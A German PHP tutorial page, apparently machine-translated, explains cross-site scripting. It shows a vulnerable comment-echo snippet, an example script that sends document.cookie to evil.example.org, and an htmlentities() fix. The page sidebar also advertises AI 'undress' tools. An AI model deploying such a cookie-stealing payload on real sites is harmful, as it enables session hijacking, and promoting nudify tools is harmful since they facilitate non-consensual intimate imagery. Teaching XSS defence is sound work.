Inhaltsverzeichnis
Cross-Site-Scripting-Angriff " > Cross-Site-Scripting-Angriff
Heim Backend-Entwicklung PHP-Tutorial PHP-Sicherheit – Cross-Site-Scripting-Angriff

PHP-Sicherheit – Cross-Site-Scripting-Angriff

Feb 22, 2017 am 09:23 AM



Cross-Site-Scripting-Angriff

Cross-Site-Scripting-Angriff ist einer der bekannte Angriffsmethoden ein. Webanwendungen auf allen Plattformen sind von diesem Problem betroffen, und PHP-Anwendungen bilden da keine Ausnahme.

Alle Anwendungen mit Eingaben sind gefährdet. Webmail, Foren, Gästebücher und sogar Blogs. Tatsächlich stellen die meisten Webanwendungen Eingaben zur Verfügung, um mehr Menschen anzulocken, aber gleichzeitig setzen sie sich dadurch auch einem Risiko aus. Cross-Site-Scripting-Schwachstellen treten auf, wenn Eingaben nicht ordnungsgemäß bereinigt und maskiert werden.

Nehmen Sie als Beispiel eine Anwendung, die die Eingabe von Kommentaren auf jeder Seite ermöglicht. Sie verwendet das folgende Formular, um Benutzern beim Senden zu helfen:

CODE:

<form action="comment.php" method="POST"
/>
  <p>Name: <input type="text" name="name"
/><br />
  Comment: <textarea name="comment" rows="10"
cols="60"></textarea><br />
  <input type="submit" value="Add Comment"
/></p>
  </form>
Nach dem Login kopieren


Das Programm besucht diese Seite zu andere Benutzer zeigen Kommentare. Beispielsweise könnte ein Codeausschnitt wie der folgende verwendet werden, um einen Kommentar ($comment) und seinen entsprechenden Autor ($name) auszugeben:

CODE:

<?php
 
  echo "<p>$name writes:<br />";
  echo
"<blockquote>$comment</blockquote></p>";
 
  ?>
Nach dem Login kopieren


Dieser Prozess berücksichtigt vollständig die Werte von $comment und $ Stellen Sie sich beim Namen Trust vor, dass der Inhalt eines von ihnen den folgenden Code enthält:

CODE:

<script>
  document.location =
    &#39;http://evil.example.org/steal.php?cookies=&#39;
+
    document.cookie
  </script>
Nach dem Login kopieren


Wenn Ihre Benutzer diesen Kommentar sehen, ist das dasselbe, als würden Sie anderen erlauben, Javascript-Code zu Ihrem Website-Quellprogramm hinzuzufügen. Ihre Benutzer senden ihre Cookies unwissentlich an evil.example.org und das empfangende Programm (steal.php) kann über die Variable $_GET['cookies'] auf alle Cookies zugreifen.

Dies ist ein häufiger Fehler, der meist durch schlechte Programmiergewohnheiten verursacht wird. Glücklicherweise sind solche Fehler leicht zu vermeiden. Da dieses Risiko nur auftritt, wenn Sie kontaminierte Daten ausgeben, stellen Sie einfach sicher, dass Sie die Eingabe filtern und die Ausgabe maskieren, wie in Kapitel 1 beschrieben.

Zumindest Sie verwenden htmlentities( ), um alle Daten zu maskieren, die Sie an den Client ausgeben möchten. Diese Funktion kann alle Sonderzeichen in eine HTML-Darstellung umwandeln. Nachdem alle Zeichen konvertiert wurden, die den Browser zu einer speziellen Verarbeitung veranlassen, kann sichergestellt werden, dass der ursprünglich eingegebene Inhalt angezeigt wird.

Daher ist es sicherer, den folgenden Code zum Anzeigen von Kommentaren zu verwenden:

CODE:

<?php
 
  $clean = array();
  $html = array();
 
  /* Filter Input ($name, $comment) */
 
  $html[&#39;name&#39;] = htmlentities($clean[&#39;name&#39;],
ENT_QUOTES, &#39;UTF-8&#39;);
  $html[&#39;comment&#39;] = htmlentities($clean[&#39;comment&#39;],
ENT_QUOTES, &#39;UTF-8&#39;);
 
  echo "<p>{$html[&#39;name&#39;]} writes:<br
/>";
  echo
"<blockquote>{$html[&#39;comment&#39;]}</blockquote></p>";
 
  ?>
Nach dem Login kopieren

Das Obige ist der Inhalt des PHP-Sicherheits-Cross-Site-Scripting-Angriffs. Weitere verwandte Inhalte finden Sie hier die chinesische PHP-Website (www.php.cn)!


Erklärung dieser Website
Der Inhalt dieses Artikels wird freiwillig von Internetnutzern beigesteuert und das Urheberrecht liegt beim ursprünglichen Autor. Diese Website übernimmt keine entsprechende rechtliche Verantwortung. Wenn Sie Inhalte finden, bei denen der Verdacht eines Plagiats oder einer Rechtsverletzung besteht, wenden Sie sich bitte an admin@php.cn

Heiße KI -Werkzeuge

Undresser.AI Undress

Undresser.AI Undress

KI-gestützte App zum Erstellen realistischer Aktfotos

AI Clothes Remover

AI Clothes Remover

Online-KI-Tool zum Entfernen von Kleidung aus Fotos.

Undress AI Tool

Undress AI Tool

Ausziehbilder kostenlos

Clothoff.io

Clothoff.io

KI-Kleiderentferner

AI Hentai Generator

AI Hentai Generator

Erstellen Sie kostenlos Ai Hentai.

Heißer Artikel

R.E.P.O. Energiekristalle erklärten und was sie tun (gelber Kristall)
2 Wochen vor By 尊渡假赌尊渡假赌尊渡假赌
Repo: Wie man Teamkollegen wiederbelebt
4 Wochen vor By 尊渡假赌尊渡假赌尊渡假赌
Hello Kitty Island Abenteuer: Wie man riesige Samen bekommt
3 Wochen vor By 尊渡假赌尊渡假赌尊渡假赌

Heiße Werkzeuge

Notepad++7.3.1

Notepad++7.3.1

Einfach zu bedienender und kostenloser Code-Editor

SublimeText3 chinesische Version

SublimeText3 chinesische Version

Chinesische Version, sehr einfach zu bedienen

Senden Sie Studio 13.0.1

Senden Sie Studio 13.0.1

Leistungsstarke integrierte PHP-Entwicklungsumgebung

Dreamweaver CS6

Dreamweaver CS6

Visuelle Webentwicklungstools

SublimeText3 Mac-Version

SublimeText3 Mac-Version

Codebearbeitungssoftware auf Gottesniveau (SublimeText3)

CakePHP-Projektkonfiguration CakePHP-Projektkonfiguration Sep 10, 2024 pm 05:25 PM

In diesem Kapitel werden wir die Umgebungsvariablen, die allgemeine Konfiguration, die Datenbankkonfiguration und die E-Mail-Konfiguration in CakePHP verstehen.

PHP 8.4 Installations- und Upgrade-Anleitung für Ubuntu und Debian PHP 8.4 Installations- und Upgrade-Anleitung für Ubuntu und Debian Dec 24, 2024 pm 04:42 PM

PHP 8.4 bringt mehrere neue Funktionen, Sicherheitsverbesserungen und Leistungsverbesserungen mit einer beträchtlichen Menge an veralteten und entfernten Funktionen. In dieser Anleitung wird erklärt, wie Sie PHP 8.4 installieren oder auf PHP 8.4 auf Ubuntu, Debian oder deren Derivaten aktualisieren. Obwohl es möglich ist, PHP aus dem Quellcode zu kompilieren, ist die Installation aus einem APT-Repository wie unten erläutert oft schneller und sicherer, da diese Repositorys in Zukunft die neuesten Fehlerbehebungen und Sicherheitsupdates bereitstellen.

CakePHP Datum und Uhrzeit CakePHP Datum und Uhrzeit Sep 10, 2024 pm 05:27 PM

Um in cakephp4 mit Datum und Uhrzeit zu arbeiten, verwenden wir die verfügbare FrozenTime-Klasse.

CakePHP-Datei hochladen CakePHP-Datei hochladen Sep 10, 2024 pm 05:27 PM

Um am Datei-Upload zu arbeiten, verwenden wir den Formular-Helfer. Hier ist ein Beispiel für den Datei-Upload.

CakePHP-Routing CakePHP-Routing Sep 10, 2024 pm 05:25 PM

In diesem Kapitel lernen wir die folgenden Themen im Zusammenhang mit dem Routing kennen.

Besprechen Sie CakePHP Besprechen Sie CakePHP Sep 10, 2024 pm 05:28 PM

CakePHP ist ein Open-Source-Framework für PHP. Es soll die Entwicklung, Bereitstellung und Wartung von Anwendungen erheblich vereinfachen. CakePHP basiert auf einer MVC-ähnlichen Architektur, die sowohl leistungsstark als auch leicht zu verstehen ist. Modelle, Ansichten und Controller gu

So richten Sie Visual Studio-Code (VS-Code) für die PHP-Entwicklung ein So richten Sie Visual Studio-Code (VS-Code) für die PHP-Entwicklung ein Dec 20, 2024 am 11:31 AM

Visual Studio Code, auch bekannt als VS Code, ist ein kostenloser Quellcode-Editor – oder eine integrierte Entwicklungsumgebung (IDE) –, die für alle gängigen Betriebssysteme verfügbar ist. Mit einer großen Sammlung von Erweiterungen für viele Programmiersprachen kann VS Code c

CakePHP erstellt Validatoren CakePHP erstellt Validatoren Sep 10, 2024 pm 05:26 PM

Der Validator kann durch Hinzufügen der folgenden zwei Zeilen im Controller erstellt werden.

See all articles